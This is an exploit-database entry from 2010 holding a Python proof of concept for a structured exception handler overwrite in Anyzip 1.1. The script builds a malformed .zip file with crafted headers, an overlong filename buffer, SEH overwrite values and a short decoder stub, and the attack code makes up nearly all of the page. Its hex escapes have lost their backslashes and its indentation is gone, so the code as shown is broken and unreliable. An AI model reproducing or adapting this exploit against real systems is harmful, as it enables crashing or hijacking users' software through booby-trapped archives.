Anyzip (.zip) v1.1 0day Poc (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Anyzip (.zip) v1.1 0day Poc (SEH)
# Published : 2010-04-07
# Author : ItSecTeam
# Previous Title : CompleteFTP v3.3.0 - Remote Memory Consumption DoS
# Next Title : Microsoft Office ( 2010 beta ) Communicator SIP denial of service Exploit

#! /usr/bin/python

# Anyzip (.zip) 0day Poc (SEH)

# Homepage : www.tbsoftinc.com
# Download : www.tbsoftinc.com/download/anyzip.exe
# Version : 1.1
# Tested Os : Windows XP SP1/SP3 EN
# Usage : Python anyzip.py
# Credit : ItSecTeam
# mail : Bug@ItSecTeam.com
# Web : WwW.ITSecTeam.com
# Forum : WwW.forum.itsecteam.com

header_1 =("x50x4Bx03x04x14x00x00"
"x00x00x00xB7xACxCEx34x00x00x00"
"x00x00x00x00x00x00x00x00"
"xe4x0f"
"x00x00x00")
header_2 = ("x50x4Bx01x02x14x00x14"
"x00x00x00x00x00xB7xACxCEx34x00x00x00"
"x00x00x00x00x00x00x00x00x00"
"xe4x0f"
"x00x00x00x00x00x00x01x00"
"x24x00x00x00x00x00x00x00")
header_3 = ("x50x4Bx05x06x00x00x00"
"x00x01x00x01x00"
"x12x10x00x00"
"x02x10x00x00"
"x00x00")
nseh="x41x41x41x41"
seh="x65x47x7ex6d"
payload = "A" * 297 + nseh + seh
predecoder = "x59x59x59x51x5c"
payload=payload+predecoder
filltoebx="B" * (100-len(predecoder))
rest = "C" * (4064-len(payload+filltoebx)) + ".txt"
payload = payload+filltoebx+rest
exploit = header_1 + payload + header_2 + payload + header_3
try:
f=open("anyzip-poc.zip",'w')
f.write(exploit)
f.close()
print "[+] File created successfully !"
except:
print "[-] Error cant write file to systemn"